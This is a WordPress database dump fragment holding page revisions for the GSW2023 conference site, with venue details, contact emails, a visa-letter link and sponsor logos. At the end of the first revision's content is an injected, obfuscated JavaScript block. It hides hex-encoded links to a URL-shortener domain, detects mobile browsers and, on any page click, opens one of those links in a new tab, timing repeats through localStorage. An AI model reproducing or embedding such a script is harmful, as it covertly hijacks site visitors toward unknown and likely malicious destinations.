sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 04:28:32','2023-08-15 04:28:32','',3066,'https://gsw2023.com/?p=5197',0,'revision','',0),
(5198,1,'2023-08-15 04:29:29','2023-08-15 04:29:29','<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" 